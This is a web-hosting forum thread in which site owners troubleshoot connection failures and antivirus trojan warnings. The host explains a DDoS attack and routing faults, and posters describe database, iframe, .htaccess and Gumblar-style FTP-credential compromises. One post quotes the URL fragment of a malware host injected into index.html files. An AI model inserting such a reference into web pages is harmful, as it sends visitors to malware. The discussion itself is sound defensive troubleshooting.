Jump to content

Potential Site Trojan


Recommended Posts

Hey guys,

 

I don't often like posting questions in here, I usually just go straight to the helpdesk if it is something I cannot work out for myself but something has me baffled at the minute and I just wanted some advice/ideas from you.

 

Recently (apparently since the reseller server I am hosted with had the apache upgrade) people on my site have been complaining that every day they are getting connection issues with the site. Pages timing out in IE and firefox and refusing to load. This is odd to me because even though there are 10 or so regular users at my site complaining of this, there are just as many who are saying they are facing no problems. Including myself. I rarely have issues connecting to the site and I even have people talking to me on MSN saying 'Is the site down? I cannot access it', but it isn't down for me. So I have explained that if there are people who can access it then the site isn't down and there must be an issue somewhere else, possibly ISP DNS servers, possibly en-route to my domain host - to be honest it could be loads of things. But the fact they say it is ONLY my site they get this issue and its not just a one off case as there are various people who are getting it makes me think maybe there could be something this end. I don't really know. Have you guys got any ideas what it could be?

 

As for the title of this thread, some of the people who are getting the connection issues are also getting warnings from their antivirus software of a potential trojan on my forum. I have downloaded a home directory backup and scanned it with Eset NOD32, AdAware and Spybot S&D and nothing comes up, so I don't know what to do. I get no warnings when trying to load the page myself either. What is the best way to test if a site has this sort of thing.

 

 

Thanks in advance,

 

OJB

Link to post
Share on other sites

Ok, one thing I would do is open a ticket with the help desk and have them give it a once over for the trojan warning. The other thing I would do is ask those users having problems accessing your site if they are on the Road Runner network. I'm on Road Runner and I was having all kinds of issues accessing sites that I knew were up because I could access them from work where we have AT&T. I have switched my DNS to use OpenDNS instead of Road Runner's DNS servers and haven't had an issue since.

Link to post
Share on other sites

Thanks for the help, Bruce.

 

I have advised those who are having connection issues to try using OpenDNS and also the next time they get any issues to do a trace route so I can see if there are any issues with the routing.

 

As for the trojan warning the weird thing is... If i download the home directory backup with ESET NOD32 enabled, it will stop the transfer due to a potential HTML/Phishing.gen trojan... but if I disable the antivirus whilst I download, then reenable it and scan the file it comes up clean.

 

I asked the help desk to give the account a once over but they said they don't/can't do scans on the linux systems and the files are my responsibility. Which is true and fair enough. So now I am a bit confused as to my next step...

Link to post
Share on other sites

My experience is that not all antivirus programs finds everything so I would scan it with a second antivirus program, just to make sure.

 

Kaspersky has an online virus scanner you can try (kaspersky.com/virusscanner). There are other online scanners from other companies as well (google for them), I just happen to like kaspersky. Or you can download the free ClamWin and try that.

 

Apart from that I would scan it with Malwarebytes Anti-Malware (malwarebytes.org/mbam.php) and Spybot Search & Destroy (safer-networking.org/index2.html).

Not sure if these two can scan a single folder like an unzipped home directory, but on the other hand its nice to know that the computer is clean in general if there is no single folder option.

Link to post
Share on other sites

I googled HTML/Phishing.gen. It sounds like it may be an attachment in an email, so make sure to check all the mailboxes, every single folder in the mail.

 

Here´s a couple of links talking about this...

sunbeltsecurity.com/ThreatDisplay.aspx?name=HTML.Phishing.Gen&tid=44381&cs=D409A08579AF582F869A1741F2FF8F83

 

eset.com/threat-center/encyclopedia/threats/htmlphishinggen

Link to post
Share on other sites

If this helps you someway, OJB, we are also experiencing (from Spain) intermitent, short (1-5 minutes) connectivity issues to our server (Palpatine) last fews weeks. It seems to be some kind of communications issue probably at Datacenter since it appears to happen only when accessing TCH, sometimes including access to help desk, forums, or TCH website itself.

 

Regarding potential trojasn on upur forums. One month ago we found several of our customers forums and pages, before the body html tag had been rewritten by someone on the server invoking an external script on a chinese domain, something like rtbn2.cn, and it caused some antiviruses to advise about the risk when dowloading the misteriously modified pages.

 

I hope this may help you some way !

Link to post
Share on other sites

Hey guys

 

Wanted to chime in here.

 

The past two weeks have been awful from a TCH operational viewpoint. First we had the large DDOS attack against our network that lasted for several days. This was mitigated and the client that was the star of the DDOS attack left TCH and went to another host. This attack resulted in many blips over the network. This has been corrected and the attack is since over.

 

This past Friday we once again started to see some network issues. There was a routing issue for several inbound routes over XO and Level 3. This was finally diagnosed and corrected late in the day on Friday. However, this once again resulted in blips across the network.

 

I am hoping we are past all these issues, and we can run into a another 2-3 year run of solid 99.99+% up time.

 

I hope this explains some of the issues everyone has been facing.

 

If you have any questions please feel free to let me know.

Link to post
Share on other sites

Thanks a lot for your post, Bill

 

Open and clear communication helps a lot to understand undergoing events and, even more important, to build trust.

 

Unfortunately, nobody can nowadys ensure something will not fail and, therefore, the most realistic expectation is to hardly work together to fix issues when they arise.

 

We all expect, as you say, many years of smooth and quiet operations !

 

Kind regards,

Link to post
Share on other sites

We have been with TCH for a long time, and this is the first time a serious issue has affected us..

 

We have 2 severs with TCH, and this morning I noticed a worrying, apparent breach. On both servers, an index.html file was compromised and references to a rogue site added. Exact addtion was '..thebettings.cn:8080/ts/in.cgi?pepsi54..' (This URL is reffered to on a malware registration site.)

 

We are checking to make sure this didn't originate from here, and so far, all the indications are that these files were somehow added in-situ on the server.

 

Has anyone else seen this problem? Thanks

Link to post
Share on other sites
We have been with TCH for a long time, and this is the first time a serious issue has affected us..

 

We have 2 severs with TCH, and this morning I noticed a worrying, apparent breach. On both servers, an index.html file was compromised and references to a rogue site added. Exact addtion was '..thebettings.cn:8080/ts/in.cgi?pepsi54..' (This URL is reffered to on a malware registration site.)

 

We are checking to make sure this didn't originate from here, and so far, all the indications are that these files were somehow added in-situ on the server.

 

Has anyone else seen this problem? Thanks

 

Your FTP password was compromised. We have replied to your help desk ticket showing you the FTP logins.

 

I will work with you thru the help desk ticket and provide you more details.

 

The server is secure, this was a account level compromise.

Link to post
Share on other sites
Open and clear communication helps a lot to understand undergoing events and, even more important, to build trust.

I also greatly appreciate the quick and open communication. Coming to the forum and seeing the explanation allowed me to realize that a) TCH was aware of the issues and was working on it, b ) I didn't have to spend an entire day investigating all the possible causes myself, c) I didn't need to file a support ticket. I was saved all the worry and a lot of time, and knew the DDoS would eventually pass, and the helpdesk was saved at least one unnecessary "Are you aware of these issues" inquiry. Considering the severity of the attack, the disruption was remarkably well mitigated. In addition, the technical details provided were educational and interesting.

:D

Link to post
Share on other sites
I have switched my DNS to use OpenDNS instead of Road Runner's DNS servers and haven't had an issue since.

By switching to OpenDNS about a year ago, I may have resolved some strange recurring IE7 freezups, although it was only one of a number of solutions I tried in combinations, so was never completely sure what the cure was.

 

At one point I tried using my ISP DNS server as the primary and OpenDNS as the secondary to serve as backup, but for some reason that didn't work well, so I just switched them both to OpenDNS.

Link to post
Share on other sites
some of the people who are getting the connection issues are also getting warnings from their antivirus software of a potential trojan on my forum. I have downloaded a home directory backup and scanned it with Eset NOD32, AdAware and Spybot S&D and nothing comes up, so I don't know what to do. I get no warnings when trying to load the page myself either. What is the best way to test if a site has this sort of thing.

You might be past this issue by now, but some potentially useful info:

 

I don't think a home directory backup includes the MySQL database, so if the malware is there (such as in the body of a forum post), all your files will test clean.

 

If the malware is referenced in an iframe or fetched by javascript from a remote site, your files will likewise test clean because the malware is only referenced in the page code. The actual malware is fetched by the visitor's browser after your server has sent the page to them.

 

Check your .htaccess for malicious redirects. Sometimes code is added that redirects visitors to a malicious page only if the referer shows that they came from Google or Yahoo search results. If you go to the site directly, as most owners would do, you get a clean page.

Link to post
Share on other sites
Your FTP password was compromised.

There is an exploit called "gumblar" (aka "martuz") now at epidemic levels. It's a password stealing Trojan that infects a user's PC, gathers up FTP logins, and sends them to remote locations from which they are used to hack websites.

 

This attack method has been around for a while, but it wasn't very common compared to the levels of RFI and SQL injection attacks, so best security practices could focus primarily on server security measures such as using strong passwords and preventing RFI and SQL injection.

 

That's changing. Securing your PC with good AV software is now more important than ever for maintaining good website security. A virus on your PC can indeed cause your website to get hacked, and in this case they steal the passwords, which is equally easy whether the passwords are strong or not.

Edited by SteveW
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...